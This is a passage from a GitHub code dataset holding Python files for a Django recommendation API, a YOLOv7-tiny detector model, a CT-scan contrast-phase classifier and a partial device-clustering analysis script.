connection\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.linear_model import LogisticRegression\nfrom scipy import sparse\n\n\ndef add_missing_columns( d, columns ):\n missing_cols = set( columns ) - set( d.columns )\n for c in missing_cols:\n d[c] = 0\n\ndef fix_columns( d, columns ):\n\n add_missing_columns( d, columns )\n assert( set( columns ) - set( d.columns ) == set())\n extra_cols = set( d.columns ) - set( columns )\n if extra_cols:\n print (\"extra columns:\", extra_cols)\n\n d = d[ columns ]\n return d\n\ndef f(df):\n keys,values=df.sort_values('categoryId').values.T\n ukeys,index=np.unique(keys,True)\n arrays=np.split(values,index[1:])\n df2=pd.DataFrame({'categoryId':ukeys,'itemdId':[list(a) for a in arrays]})\n return df2\n\nclass DataList(APIView):\n '''\n Class for save 
actual state of recommended items\n '''\n def post(self,request,format=None):\n json_data = request.body.decode('utf-8')\n data1 = json.loads(json_data)\n unix_timestamp = float(data1['clickDate'])/1000\n local_timezone = tzlocal.get_localzone()\n time_format = datetime.fromtimestamp(unix_timestamp, local_timezone)\n data1['clickDate'] = time_format.isoformat()\n data2 = {\"itemId\": data1['itemId'], \"state\": data1['state']}\n data1.pop('state')\n serializer = DataSerializer(data=data1)\n serializer1 = ItemsStateSerializer(data=data2)\n if serializer.is_valid():\n serializer.save()\n if serializer1.is_valid():\n serializer1.save()\n return JsonResponse({\"data1\": serializer.data, \"data2\": serializer1.data})\n\n def get(self, request, format=None):\n return Response(\"WORK WORK WORK\", status=status.HTTP_200_OK)\n\nclass DataList2(APIView):\n def post(self,request,format=None):\n #start_time = time.time()\n json_data = request.body.decode('utf-8')\n data1 = json.loads(json_data)\n unix_timestamp = float(data1['clickDate'])/1000\n local_timezone = tzlocal.get_localzone()\n time_format = datetime.fromtimestamp(unix_timestamp, local_timezone)\n data1['clickDate'] = time_format.isoformat()\n test = pd.DataFrame.from_dict(data1, orient='index').T\n page = int(test['page'])\n rows = int(test['rows'])\n end = page * rows\n start = end - rows\n\n # categories\n\n lb = LabelEncoder()\n lb.classes_ = np.load(os.path.join(BASE_DIR, 'check/classes.npy'))\n test = test.fillna(0)\n test['weekday'] = time_format.weekday()\n test['month'] = time_format.month\n X_test = test[['itemId', 'countryCode', 'weekday', 'month', 'market']]\n X_test = pd.concat([X_test, pd.get_dummies(X_test['market'],\n prefix=\"market\"),\n pd.get_dummies(X_test['countryCode'], prefix=\"countryCode\")],\n axis=1)\n X_test1 = X_test.drop(['countryCode', 'market'], axis=1)\n X = pickle.load(open(os.path.join(BASE_DIR, 'check/trainDataFrame.pkl'), 'rb'))\n fixed_d = fix_columns(X_test1, X.columns)\n clf = pickle.load(open(os.path.join(BASE_DIR, 'check/model.pkl'), 'rb'))\n categories = clf.predict(fixed_d)\n categories_probability = clf.predict_proba(fixed_d)\n categoryBest = []\n for x in categories_probability:\n categoryBest.append(round(x.max(), 3))\n cats = lb.inverse_transform(categories)\n\n user_to_item_matrix = pickle.load(open(os.path.join(BASE_DIR, 'check/user_item_matrix.pkl'), 'rb'))\n #sparse.load_npz(os.path.join(BASE_DIR, 'check/user_item_matrix.npz'))\n cosine_similarity_matrix = cosine_similarity(user_to_item_matrix, user_to_item_matrix, dense_output=False)\n cosine_similarity_matrix.setdiag(0)\n\n # train - table\n cursor = connection.cursor()\n cursor.execute(\n '''\n select distinct *\n from clicks_recommend\n where userId is not null and itemId is not null;\n '''\n )\n clicks = cursor.fetchall()\n events = pd.DataFrame(list(clicks), columns=['id', 'market', 'countryCode', 'userId',\n 'clickType', 'clickDate', 'itemId', 'page', 'rows'])\n\n users_list = list(events['userId'])\n current_user = list(test['userId'])[0]\n\n cursor.execute(\n '''\n select a.itemId, a.state, max(a.updateTime)\n from items_recommend_state as a\n where a.state = '003'\n group by a.itemId, a.state;\n '''\n )\n states = cursor.fetchall()\n state = pd.DataFrame(list(states), columns=['itemId', 'state', 'time'])\n if current_user in users_list:\n user_recommended = cosine_similarity_matrix[current_user].argmax()\n coo_user_matrix = user_to_item_matrix[user_recommended].tocoo()\n sort_df = pd.DataFrame({'itemId': [x for x in 
coo_user_matrix.col],\n 'value': [y for y in coo_user_matrix.data]})\n sort_df = sort_df.sort_values(by=['value'], ascending=False).reset_index()\n sort_df = sort_df[['itemId', 'value']]\n sort_df['probability'] = sort_df['value'].apply(lambda x: round(x / sort_df['value'].max(), 3))\n full_df = pd.merge(sort_df, state, how='left', on='itemId')\n full_df = full_df[~pd.isnull(full_df['state'])]\n full_df = full_df.drop_duplicates(['itemId'])\n items = list(full_df['itemId'])\n probab = list(full_df['probability'])\n items_save = items[start:end]\n probab_save = probab[start:end]\n\n flg = 0\n if len(items) - end >= 0:\n flg = 1\n\n items_list = []\n for k, v in zip(items_save, probab_save):\n tmp_dict = {\"itemId\": k, \"percentItem\": v}\n items_list.append(tmp_dict)\n\n finalDict = {\"market\": list(test['market'])[0],\n \"countryCode\": list(test['countryCode'])[0],\n \"userId\": list(test['userId'])[0],\n \"categoryId\": cats[0],\n \"categoryPercentage\": categoryBest[0],\n \"isNext\": flg,\n \"items\": items_list}\n serializer = ResultSerializer(finalDict)\n return JsonResponse(serializer.data)\n else:\n cursor.execute(\n '''\n select b.itemId,\n b.cnt\n from\n (select a.itemId,\n a.countryCode,\n count(a.itemId) as cnt\n from clicks_recommend as a\n group by a.itemId, a.countryCode) as b\n where b.countryCode = %s\n order by b.cnt desc;\n ''', [list(test['countryCode'])[0]]\n )\n top_sold = cursor.fetchall()\n top_items = pd.DataFrame(list(top_sold), columns=['itemId', 'cnt'])\n top_items['probability'] = top_items['cnt'].apply(lambda x: round(x / top_items['cnt'].max(), 3))\n full_df = pd.merge(top_items, state, how='left', on='itemId')\n full_df = full_df[~pd.isnull(full_df['state'])]\n full_df = full_df.drop_duplicates(['itemId'])\n items = list(full_df['itemId'])\n probab = list(full_df['probability'])\n items_save = items[start:end]\n probab_save = probab[start:end]\n\n flg = 0\n if len(items) - end >= 0:\n flg = 1\n\n items_list = []\n for k, v in zip(items_save, probab_save):\n tmp_dict = {\"itemId\": k, \"percentItem\": v}\n items_list.append(tmp_dict)\n\n finalDict = {\"market\": list(test['market'])[0],\n \"countryCode\": list(test['countryCode'])[0],\n \"userId\": list(test['userId'])[0],\n \"categoryId\": cats[0],\n \"categoryPercentage\": categoryBest[0],\n \"isNext\": flg,\n \"items\": items_list}\n serializer = ResultSerializer(finalDict)\n return JsonResponse(serializer.data)\n\n return Response(\"OK\")\n def get(self, request, format=None):\n return Response(\"WORK WORK WORK\", status=status.HTTP_200_OK)\n\n\nclass DataList3(APIView):\n '''\n Class for training of user_item_matrix\n '''\n\n def get(self, request, format=None):\n return Response(\"WORK WORK WORK\", status=status.HTTP_200_OK)\n\n def post(self, request, format=None):\n start = datetime.now()\n cursor = connection.cursor()\n cursor.execute(\n '''\n select distinct id as itemId\n from one_items ;\n '''\n )\n items = cursor.fetchall()\n df_items = pd.DataFrame(list(items), columns=['itemId'])\n cursor.execute(\n '''\n select distinct *\n from clicks_recommend\n where userId is not null and itemId is not null;\n '''\n )\n clicks = cursor.fetchall()\n events = pd.DataFrame(list(clicks), columns=['id', 'market', 'countryCode', 'userId',\n 'clickType', 'clickDate','itemId', 'page', 'rows'])\n n_users = events['userId'].max()\n n_items = df_items['itemId'].max()\n #print(str(n_users) + \" \" + str(n_items))\n user_to_item_matrix = sparse.dok_matrix((n_users + 1, n_items + 2), dtype=np.int8)\n\n action_weights = 
{'CREDIT': 4, 'HOMEPAGE': 3, 'BUYNOW': 5,\n 'PLACEBID': 2, 'SHOWBIDS': 1}\n\n for row in events.itertuples():\n mapped_user_key = row[4]\n event_type = row.clickType\n if event_type in action_weights.keys():\n user_to_item_matrix[mapped_user_key, row[7]] = action_weights[event_type]\n #sparse.save_npz(os.path.join(BASE_DIR, 'check/user_item_matrix.npz'), user_to_item_matrix)\n pickle.dump(user_to_item_matrix, open(os.path.join(BASE_DIR, 'check/user_item_matrix.pkl'), 'wb'))\n print(\"Process of training finished. It took {}.\".format(datetime.now() - start))\n return Response(\"TRAIN OK\", status=status.HTTP_200_OK)\n\n\nclass DataList4(APIView):\n '''\n Class for training classification\n '''\n\n def get(self, request, format=None):\n return Response(\"WORK WORK WORK\", status=status.HTTP_200_OK)\n\n def post(self, request, format=None):\n # start_time = time.time()\n cursor = connection.cursor()\n cursor.execute(\n \"(select a.userId, a.market, a.clickType, a.clickDate, a.itemId, a.countryCode, b.categoryId from clicks_recommend a join one_items_categories b on a.itemId = b.itemId order by a.id desc limit 50000) union all (select a.userId, a.market, a.clickType, a.clickDate, a.itemId, a.countryCode, b.categoryId from clicks_recommend a join one_items_categories b on a.itemId = b.itemId order by a.id limit 50000);\"\n )\n clicks = cursor.fetchall()\n df = pd.DataFrame(list(clicks),\n columns=['userId', 'market', 'clickType', 'clickDate', 'itemId', 'countryCode', 'categoryId'])\n print(df.head())\n df = df.fillna(0)\n df['time'] = pd.to_datetime(df['clickDate'])\n df['weekday'] = df['time'].apply(lambda x: x.weekday())\n df['month'] = df['time'].apply(lambda x: x.month)\n pickle.dump(df, open('trainFull.pkl', 'wb'), protocol=2)\n df_buy = df[df['clickType'] == 'BUYNOW']\n df_hp = df[(df['clickType'] == 'HOMEPAGE')]\n frames = [df_buy, df_hp]\n result = pd.concat(frames)\n X_M = result[['itemId', 'countryCode', 'weekday', 'month', 'market']]\n lb = LabelEncoder()\n lb.fit(result.categoryId)\n y = lb.transform(result.categoryId)\n np.save('classes.npy', lb.classes_)\n X = pd.concat([X_M, pd.get_dummies(X_M['countryCode'], prefix=\"countryCode\"),\n pd.get_dummies(X_M['market'], prefix=\"market\")], axis=1)\n X = X.drop(['countryCode', 'market'], axis=1)\n pickle.dump(X, open('trainDataFrame.pkl', 'wb'), protocol=2)\n clf = LogisticRegression()\n clf = clf.fit(X, y)\n filename = 'model.pkl'\n pickle.dump(clf, open(filename, 'wb'), protocol=2)\n # print(\"--- %s seconds ---\" % (time.time() - start_time))\n return Response(\"TRAIN OK\", status=status.HTTP_200_OK)\n\n\nclass DataList5(APIView):\n '''\n Class for update status\n '''\n def get(self, request, format=None):\n return Response(\"WORK WORK WORK\", status=status.HTTP_200_OK)\n\n #{\"itemId\": 697153, \"active\": true}\n def post(self, request, format=None):\n # start_time = time.time()\n json_data = request.body.decode('utf-8')\n data1 = json.loads(json_data)\n if data1['active'] is True:\n data2 = {\"itemId\": data1['itemId'], \"state\": \"003\"}\n else:\n data2 = {\"itemId\": data1['itemId'], \"state\": \"005\"}\n serializer1 = ItemsStateSerializer(data=data2)\n if serializer1.is_valid():\n serializer1.save()\n return Response(\"OK\", status=status.HTTP_200_OK)\n\n\n\n","repo_name":"mmiomika/TestAPI","sub_path":"check/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"573488071","text":"import numpy 
as np\nfrom tensorflow.keras.layers import (Concatenate, Input, Lambda, MaxPooling2D,\n                                     UpSampling2D, ZeroPadding2D)\nfrom tensorflow.keras.models import Model\n\nfrom nets.backbone import (DarknetConv2D, DarknetConv2D_BN_Leaky,\n                           Multi_Concat_Block, darknet_body)\nfrom nets.yolo_training import yolo_loss\n\n\ndef SPPCSPC(x, c2, n=1, shortcut=False, g=1, e=0.5, k=(13, 9, 5), weight_decay=5e-4, name=\"\"):\n    c_ = int(2 * c2 * e) # hidden channels\n    x1 = DarknetConv2D_BN_Leaky(c_, (1, 1), weight_decay=weight_decay, name = name + '.cv1')(x)\n    \n    y1 = Concatenate(axis=-1)([MaxPooling2D(pool_size=(m, m), strides=(1, 1), padding='same')(x1) for m in k] + [x1])\n    y1 = DarknetConv2D_BN_Leaky(c_, (1, 1), weight_decay=weight_decay, name = name + '.cv3')(y1)\n    \n    y2 = DarknetConv2D_BN_Leaky(c_, (1, 1), weight_decay=weight_decay, name = name + '.cv2')(x)\n    out = Concatenate(axis=-1)([y1, y2])\n    out = DarknetConv2D_BN_Leaky(c2, (1, 1), weight_decay=weight_decay, name = name + '.cv4')(out)\n    \n    return out\n\n#---------------------------------------------------#\n#   Build the PANet and obtain the prediction results\n#---------------------------------------------------#\ndef yolo_body(input_shape, anchors_mask, num_classes, weight_decay=5e-4):\n    #-----------------------------------------------#\n    #   Define the yolov7-tiny parameters\n    #-----------------------------------------------#\n    transition_channels = 16\n    block_channels = 16\n    panet_channels = 16\n    e = 1\n    n = 2\n    ids = [-1, -2, -3, -4]\n    #-----------------------------------------------#\n    #   The input image is 640, 640, 3\n    #-----------------------------------------------#\n\n    inputs = Input(input_shape)\n    #---------------------------------------------------# \n    #   Build the backbone and obtain three effective feature layers\n    #   with the following shapes:\n    #   80, 80, 256\n    #   40, 40, 512\n    #   20, 20, 1024\n    #---------------------------------------------------#\n    feat1, feat2, feat3 = darknet_body(inputs, transition_channels, block_channels, n, weight_decay)\n\n    # 20, 20, 1024 -> 20, 20, 512\n    P5 = SPPCSPC(feat3, transition_channels * 16, weight_decay=weight_decay, name=\"sppcspc\")\n    P5_conv = DarknetConv2D_BN_Leaky(transition_channels * 8, (1, 1), weight_decay=weight_decay, name=\"conv_for_P5\")(P5)\n    P5_upsample = UpSampling2D()(P5_conv)\n    P4 = Concatenate(axis=-1)([DarknetConv2D_BN_Leaky(transition_channels * 8, (1, 1), weight_decay=weight_decay, name=\"conv_for_feat2\")(feat2), P5_upsample])\n    P4 = Multi_Concat_Block(P4, panet_channels * 4, transition_channels * 8, e=e, n=n, ids=ids, weight_decay=weight_decay, name=\"conv3_for_upsample1\")\n\n    P4_conv = DarknetConv2D_BN_Leaky(transition_channels * 4, (1, 1), weight_decay=weight_decay, name=\"conv_for_P4\")(P4)\n    P4_upsample = UpSampling2D()(P4_conv)\n    P3 = Concatenate(axis=-1)([DarknetConv2D_BN_Leaky(transition_channels * 4, (1, 1), weight_decay=weight_decay, name=\"conv_for_feat1\")(feat1), P4_upsample])\n    P3 = Multi_Concat_Block(P3, panet_channels * 2, transition_channels * 4, e=e, n=n, ids=ids, weight_decay=weight_decay, name=\"conv3_for_upsample2\")\n    \n    P3_downsample = ZeroPadding2D(((1, 1),(1, 1)))(P3)\n    P3_downsample = DarknetConv2D_BN_Leaky(transition_channels * 8, (3, 3), strides = (2, 2), weight_decay=weight_decay, name = 'down_sample1')(P3_downsample)\n    P4 = Concatenate(axis=-1)([P3_downsample, P4])\n    P4 = Multi_Concat_Block(P4, panet_channels * 4, transition_channels * 8, e=e, n=n, ids=ids, weight_decay=weight_decay, name=\"conv3_for_downsample1\")\n\n    P4_downsample = ZeroPadding2D(((1, 1),(1, 1)))(P4)\n    P4_downsample = DarknetConv2D_BN_Leaky(transition_channels * 16, (3, 3), strides = (2, 2), 
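# note (added comment): this stride-2 3x3 conv halves P4 (40, 40 -> 20, 20) before fusion with P5\n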
weight_decay=weight_decay, name = 'down_sample2')(P4_downsample)\n    P5 = Concatenate(axis=-1)([P4_downsample, P5])\n    P5 = Multi_Concat_Block(P5, panet_channels * 8, transition_channels * 16, e=e, n=n, ids=ids, weight_decay=weight_decay, name=\"conv3_for_downsample2\")\n    \n    P3 = DarknetConv2D_BN_Leaky(transition_channels * 8, (3, 3), strides=(1, 1), weight_decay=weight_decay, name=\"rep_conv_1\")(P3)\n    P4 = DarknetConv2D_BN_Leaky(transition_channels * 16, (3, 3), strides=(1, 1), weight_decay=weight_decay, name=\"rep_conv_2\")(P4)\n    P5 = DarknetConv2D_BN_Leaky(transition_channels * 32, (3, 3), strides=(1, 1), weight_decay=weight_decay, name=\"rep_conv_3\")(P5)\n\n    # len(anchors_mask[2]) = 3\n    # 5 + num_classes -> 4 + 1 + num_classes\n    # 4 are the anchor-box regression coefficients, 1 is a sigmoid confidence fixed to 0-1,\n    # and num_classes is used to decide which class of object the anchor box contains\n    # bs, 20, 20, 3 * (4 + 1 + num_classes)\n    out2 = DarknetConv2D(len(anchors_mask[2]) * (5 + num_classes), (1, 1), weight_decay=weight_decay, strides = (1, 1), name = 'yolo_head_P3')(P3)\n    out1 = DarknetConv2D(len(anchors_mask[1]) * (5 + num_classes), (1, 1), weight_decay=weight_decay, strides = (1, 1), name = 'yolo_head_P4')(P4)\n    out0 = DarknetConv2D(len(anchors_mask[0]) * (5 + num_classes), (1, 1), weight_decay=weight_decay, strides = (1, 1), name = 'yolo_head_P5')(P5)\n    return Model(inputs, [out0, out1, out2])\n\ndef get_train_model(model_body, input_shape, num_classes, anchors, anchors_mask, label_smoothing):\n    y_true = [Input(shape = (input_shape[0] // {0:32, 1:16, 2:8}[l], input_shape[1] // {0:32, 1:16, 2:8}[l], \\\n                    len(anchors_mask[l]), 2)) for l in range(len(anchors_mask))] + [Input(shape = [None, 5])]\n    model_loss = Lambda(\n        yolo_loss, \n        output_shape = (1, ), \n        name = 'yolo_loss', \n        arguments = {\n            'input_shape' : input_shape, \n            'anchors' : anchors, \n            'anchors_mask' : anchors_mask, \n            'num_classes' : num_classes, \n            'label_smoothing' : label_smoothing, \n            'balance' : [0.4, 1.0, 4],\n            'box_ratio' : 0.05,\n            'obj_ratio' : 1 * (input_shape[0] * input_shape[1]) / (640 ** 2), \n            'cls_ratio' : 0.5 * (num_classes / 80)\n        }\n    )([*model_body.output, *y_true])\n    model = Model([model_body.input, *y_true], model_loss)\n    return model\n","repo_name":"bubbliiiing/yolov7-tiny-tf2","sub_path":"nets/yolo.py","file_name":"yolo.py","file_ext":"py","file_size_in_byte":6409,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"}
{"seq_id":"27618874434","text":"import numpy as np\nimport pandas as pd\nimport os\nimport timm\nfrom tqdm import tqdm\nfrom statistics import mode\nimport glob\n\nimport torch\nimport torch.nn as nn\n\n\nmodel_name = \"efficientnet_b2\"\nckp_path = \"/home/single1/BACKUP/binhdao/binhdao/weights/EfficientNet_b2_224.pth\"\n\nlabel_dict = {0: \"Non Contrast\", 1: \"Venous\", 2: \"Arterial\", 3: \"Others\"}\n\n# data = glob.glob('/home/single1/BACKUP/binhdao/lits/Training_Batch1/media/nas/01_Datasets/CT/LITS/Training_Batch_1/volume*')\ndata = glob.glob(\n    \"/home/single1/BACKUP/binhdao/lits/Training_Batch2/media/nas/01_Datasets/CT/LITS/Training_Batch_2/volume*\"\n)\n\n\nwindow_width = 400\nwindow_center = 50\n\ndef apply_window(img, ww: float, wc: float):\n    \"\"\"\n    Apply HU window on a HU image\n\n    Args:\n        img: Image to transform\n        ww: Window width\n        wc: Window center\n    \"\"\"\n    lower_bound = wc - ww / 2\n    upper_bound = wc + ww / 2\n\n    img[img < lower_bound] = lower_bound\n    img[img > upper_bound] = 
upper_bound\n\n img = (img - wc) / ww * (upper_bound - lower_bound) + lower_bound\n\n return img\n\n\ndef preprocess_image(\n img,\n ww: float,\n wc: float,\n):\n \"\"\"\n Preprocess raw image extracting from dicom files.\n 1. Apply formula:\n new_img = old_img * rescale_slope + rescale_intercept\n 2. Apply HU window\n\n Args:\n img: input image (numpy array)\n ww: window width of HU window\n wc: window center of HU window\n rescale_slope: float\n rescale_intercept: float\n\n Return\n \"\"\"\n img = apply_window(img, ww, wc)\n\n return img\n\n\ndef build_model(model_name):\n model = timm.create_model(model_name, pretrained=False)\n num_class = 4\n if \"resnet\" in model_name:\n model.fc = nn.Linear(512, num_class)\n elif \"efficientnet\" in model_name:\n model.classifier = nn.Linear(model.classifier.in_features, num_class)\n return model\n\n\ndef load_model(model, path):\n if os.path.isfile(path):\n ckpt = torch.load(path, \"cpu\")\n model.load_state_dict(ckpt.pop(\"state_dict\"))\n start_epoch, best_metric = ckpt[\"epoch\"], ckpt[\"best_metric\"]\n\n return model\n\n\nclass Data(Dataset):\n def __init__(self, imgs):\n \"\"\"A Dataset object that load all data for running\n\n Args:\n cfg (CfgNode): Config object containing running configuration\n mode (str): Model running mode\n \"\"\"\n self.imgs = imgs.transpose(2, 1, 0)\n\n def __len__(self):\n return len(self.imgs)\n\n def __getitem__(self, idx):\n img = self.imgs[idx]\n img = cv2.flip(img, 0)\n img = preprocess_image(img, window_width, window_center).astype(\"float\")\n img = cv2.normalize(\n img, None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_32F\n )\n\n img = np.stack((img,) * 3, axis=-1)\n\n # RESIZE IMAGE\n img = cv2.resize(img, (224, 224), interpolation=cv2.INTER_AREA)\n\n img = img.transpose(2, 0, 1)\n\n return img\n\n\ndef build_dataloader(imgs):\n \"\"\"Build dataloader\n\n Returns:\n dataloader: Dataloader object\n \"\"\"\n\n dataset = Data(imgs)\n # DEBUG: Only take a subset of dataloader to run script\n dataloader = DataLoader(\n dataset, 2, pin_memory=False, shuffle=False, drop_last=False, num_workers=4\n )\n return dataloader\n\n\ndef predict_scan(nii_path, model):\n\n img = nib.load(nii_path)\n img = img.get_fdata()\n\n dataloader = build_dataloader(img)\n preds = list()\n\n for image in tqdm(dataloader):\n with torch.no_grad():\n image = image.float().cuda()\n output = model(image)\n sigmoid = nn.Sigmoid()\n pred = torch.argmax(sigmoid(output), 1)\n\n # Convert target, prediction to numpy\n pred = list(pred.detach().cpu().numpy())\n preds += pred\n\n series_pred = mode(preds)\n\n del img, dataloader, preds, output\n return series_pred\n\n\nif __name__ == \"__main__\":\n model = build_model(model_name)\n model_ckp = load_model(model, ckp_path)\n model.eval()\n model.cuda()\n\n predictions = []\n\n for scan in tqdm(data):\n predictions.append(predict_scan(scan, model))\n\n scan_names = [scan.split(\"/\")[-1] for scan in data]\n df = pd.DataFrame({\"Name\": scan_names, \"Prediction\": predictions})\n df.to_csv(\"LITS_prediction.csv\", index=False)\n","repo_name":"vinbigdata-medical/MIDL2021-CT-Classification","sub_path":"study_evaluation/infer_lits.py","file_name":"infer_lits.py","file_ext":"py","file_size_in_byte":4462,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"30970999170","text":"import csv\nimport os\nimport numpy as np\nfrom sklearn.cluster import KMeans\nfrom sklearn.cluster import AffinityPropagation\nfrom sklearn.cluster import 
MeanShift, estimate_bandwidth\nfrom sklearn import metrics\nfrom sklearn.cluster import DBSCAN\nfrom matplotlib import pyplot as plt\n\nMIN_SAMPLES = 3 # dbscan min samples\nEPS = 0.0275 # dbscan epsilon value\nDIVISOR = 234 # divisor for scaling\nOVERLAP = 1000\nSTEP = 150\nSTOP = 10500\n# array to hold maximum range within clusters\nmax_inter_cluster = []\nintra_cluster_distance = []\n# array to hold deviation from pivot\nglobal_array = []\n# array to hold pivot data\npivot_array = []\n# array to hold sum of execution time values\nb = []\n# array to hold device names\ndevice_list = []\n# array to hold cluster values for each device\ncluster_list = []\ncluster_list2 = []\nclus_list2 = []\ncluster_list3 = []\nclus_list3 = []\ncluster_list4 = []\nclus_list4 = []\n# array to hold updated cluster list\ncluster_list_new = []\n# path to directory for data\ndir_path = \"/Users/laric/Documents/NewResults/\"\n# path to pivot data\ndir_path_pivot = \"/Users/laric/Documents/NewResults/v.csv\"\n# Holds values for num of devices per cluster\nsecond = []\n# 2-clusters counter\ntwo_count: int = 0\nbig_twos_ = []\n# 3-clusters counter\nthree_count: int = 0\nbig_threes_ = []\n# 4-clusters counter\nfour_count: int = 0\nbig_fours_ = []\n# 5-clusters counter\nfive_count: int = 0\n\nnum_clusters = []\nmax_dist = 0\n\nrange2 = []\naverage2 = []\nrange3 = []\naverage3 = []\nrange4 = []\naverage4 = []\n\nfont = {'family': 'serif',\n        'size': 18}\n\ncombined_list_to_plot = []\n\n# create devices\nfor c in range(37):\n    name = \"Device\" + str(c + 1)\n    device_list.append(name)\n\n# build the device/value pairs once, after all names exist\nnew_list = list(zip(device_list, np.zeros(len(device_list))))\n# convert list of devices to numpy array\nnp_dev_list = np.asarray(new_list)\n\n\ndef main():\n    # get the deviations for each device\n    tempList = get_devices_overlap()\n\n    for i in range(70):\n        # if i != 0 and i != 3 and i != 4:\n        if 1 == 1:\n            # if i != 0 and i != 1 and i != 7:\n            print('Clustering point {0}'.format(i))\n            y = list(zip(tempList[i], np.zeros(len(tempList[i]))))\n            # print(Y)\n            x = np.asarray(y)\n            dbscan(x)\n            # k_Means(x)\n            # affinity_propagation(x)\n            # mean_shift(x)\n\n    for j in range(len(clus_list2)):\n        if j != 0:\n            cluster_list2.append(clus_list2[j])\n\n    for j in range(len(clus_list3)):\n        if j != 0 and j != 5 and j != 8:\n            cluster_list3.append(clus_list3[j])\n\n    for j in range(len(clus_list4)):\n        if j != 16 and j != 17:\n            cluster_list4.append(clus_list4[j])\n\n    distances()\n    go_to_all_to_all()\n    # go_to_process()\n    # plotHisto()\n    # process_cluster_all_to_all(cluster_list, 3)\n    num_clusters.sort()\n    d = {z: num_clusters.count(z) for z in num_clusters}\n    print(d)\n    checker()\n    # print('Two clusters: {0} \\nThree clusters: {1} \\nFour clusters: {2}'.\n    #       format(len(cluster_list2), len(cluster_list3), len(cluster_list4)))\n\n\ndef distances():\n    range2_mean_ = np.mean(range2)\n    range3_mean_ = np.mean(range3)\n    range4_mean_ = np.mean(range4)\n\n    average2_mean_ = np.mean(average2)\n    average3_mean_ = np.mean(average3)\n    average4_mean_ = np.mean(average4)\n\n    range2_std_ = np.std(range2)\n    range3_std_ = np.std(range3)\n    range4_std_ = np.std(range4)\n\n    average2_std_ = np.std(average2)\n    average3_std_ = np.std(average3)\n    average4_std_ = np.std(average4)\n\n    # print(range2_mean_)\n    # print(range3_mean_)\n    # print(range4_mean_)\n\n    # Create lists for the plot\n    labels = ['2-Clusters', '3-Clusters', '4-Clusters']\n    x_pos = np.arange(len(labels))\n    CTEs_range = [range2_mean_, range3_mean_, range4_mean_]\n    error_range = [range2_std_, range3_std_, range4_std_]\n    CTEs_average 
= [average2_mean_, average3_mean_, average4_mean_]\n    error_average = [average2_std_, average3_std_, average4_std_]\n    width = 0.2\n\n    # Build the plot\n    fig, ax = plt.subplots()\n    p1 = ax.bar(x_pos, CTEs_range, width=width, yerr=error_range,\n                align='center', capsize=10,\n                color='lightgray', hatch = 'o', edgecolor = 'black')\n\n    p2 = ax.bar(x_pos + width, CTEs_average, width=width, yerr=error_average,\n                align='center', capsize=10, color='lightblue',\n                hatch = 'x', edgecolor = 'black')\n    ax.set_xlabel('Clusters per clustering point', fontsize=18)\n    ax.set_ylabel('Distance', fontsize=18)\n    ax.set_xticks(x_pos + width / 2)\n    ax.set_xticklabels(labels, fontsize=18)\n    ax.tick_params(axis='y', labelsize=16)\n    ax.legend((p1[0], p2[0]), ('Intra-cluster distance', 'Inter-cluster distance'),\n              fontsize=18)\n    # ax.yaxis.grid(True)\n\n    # Save the figure and show\n    plt.tight_layout()\n    plt.rc('font', **font)\n    #plt.savefig('Results/inter_cluster_new_june3.pdf')\n    plt.show()\n\n    two_t = transpose(big_twos_)\n    three_t = transpose(big_threes_)\n    four_t = transpose(big_fours_)\n\n    two_tt = [np.mean(z) for z in two_t]\n    three_tt = [np.mean(z) for z in three_t]\n    four_tt = [np.mean(z) for z in four_t]\n\n    two_tt_ = [np.std(z) for z in two_t]\n    three_tt_ = [np.std(z) for z in three_t]\n    four_tt_ = [np.std(z) for z in four_t]\n\n    y2 = [z for z in two_tt if z != 0]\n    y3 = [z for z in three_tt if z != 0]\n    y4 = [z for z in four_tt if z != 0]\n\n    y2_ = [z for z in two_tt_ if z != 0]\n    y3_ = [z for z in three_tt_ if z != 0]\n    y4_ = [z for z in four_tt_ if z != 0]\n\n    # print(two_ttt)\n    # print(three_ttt)\n    # print(four_ttt)\n\n    # plot for number of devices per cluster\n    width_ = 1\n    group_gap_ = 1\n\n    labels_ = ['C1', 'C2', 'OUT', 'C1', 'C2', 'C3', 'OUT',\n               'C1', 'C2', 'C3', 'C4', 'OUT']\n\n    x2 = np.arange(len(y2))\n    x3 = np.arange(len(y3)) + group_gap_ + len(y2)\n    x4 = np.arange(len(y4)) + group_gap_ + len(y3) + group_gap_ + len(y2)\n    ind = np.concatenate((x2, x3, x4))\n    print(ind)\n\n    fig, ax = plt.subplots()\n    rects1 = ax.bar(x2, y2, width_, edgecolor=\"black\", label=\"2-Clusters\",\n                    yerr=y2_, align='center', capsize=10, color='lightgray', hatch = 'o')\n    rects2 = ax.bar(x3, y3, width_, edgecolor=\"black\", label=\"3-Clusters\",\n                    yerr=y3_, align='center', capsize=10,\n                    color='lightblue', hatch = 'o')\n    rects3 = ax.bar(x4, y4, width_, edgecolor=\"black\", label=\"4-Clusters\",\n                    yerr=y4_, align='center', capsize=10,\n                    color='white', hatch = '/')\n    ax.set_ylabel('Number of Devices', fontsize=18, fontweight='bold')\n    ax.set_xticks(ind)\n    #ax.set_xticklabels('C1', 'C2', 'OUT', 'C1', 'C2', 'C3', 'OUT',\n    #'C1', 'C2', 'C3', 'C4', 'OUT')\n    ax.set_xticklabels(labels_, fontsize=13.5, fontweight='bold')\n    ax.tick_params(axis='y', labelsize=16)\n    ax.legend(loc=1, fontsize=18)\n\n    # Save the figure and show\n    plt.tight_layout()\n    plt.rc('font', **font)\n    #plt.savefig('Results/num_devices_new_june3.pdf')\n    plt.show()\n\n\ndef 
